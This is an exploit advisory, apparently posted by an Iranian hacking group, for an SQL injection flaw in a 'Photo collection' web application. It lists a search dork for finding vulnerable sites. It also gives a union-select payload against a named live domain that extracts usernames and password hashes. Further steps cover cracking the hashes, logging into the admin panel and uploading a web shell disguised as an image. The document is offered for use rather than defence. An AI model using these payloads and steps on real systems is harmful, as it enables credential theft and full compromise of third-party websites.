-------------------- IN The NAme OF God -------------------- -====Photo collection Remote Sql Injection Vulnerability====- # Exploit Title: Photo collection Remote Sql Injection Vulnerability # Exploit Author: Mr.XpR # Tested on: BackTrack , 7 , Redhat # Version : 1.5 # MAil : No0pm@yahoo.com -====Dork====- inurl:index.php?Blog=*&user_id= intext: Copyright (c) 2010-2012 by photo collection. All rights reserved! -====Exploit====- http://Site.C0M/index.php?Blog=11&user_id=[Sqli] -====Example====- http://www.dakghor.com/index.php?Blog=11&user_id=-9999+union+select+group_concat%28user_name,0x3a,user_password%29+from+be_users-- -====information====- Crack Joomla Hash IN ~~~ > http://www.md5decrypter.co.uk/ Admin Page ~~~~~~~~~> Front PAge With Email And PAssword Login To panel :D Click <<--- Add Profile Picture or Add Picture -----Upload She3ll~~~> Sh3ll.jpg 0r Sh3ll.php.Jpg And Load From http://www.xxxxx.com/images/users/Sh3ll.jpg -====Tnx To====- Persian Gulf For Ever ~~~~ > W3 Are Persian Hackerz MR.XpR - MMT - Samim.s - FarbodEZRaeL - Inj3Ctor - Black.Viper - UnknowN Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ... And All IraNHAck Security Team Members ~~~~~~~~~~~~~~~~~~~~~~>> IRANHaCK.ORG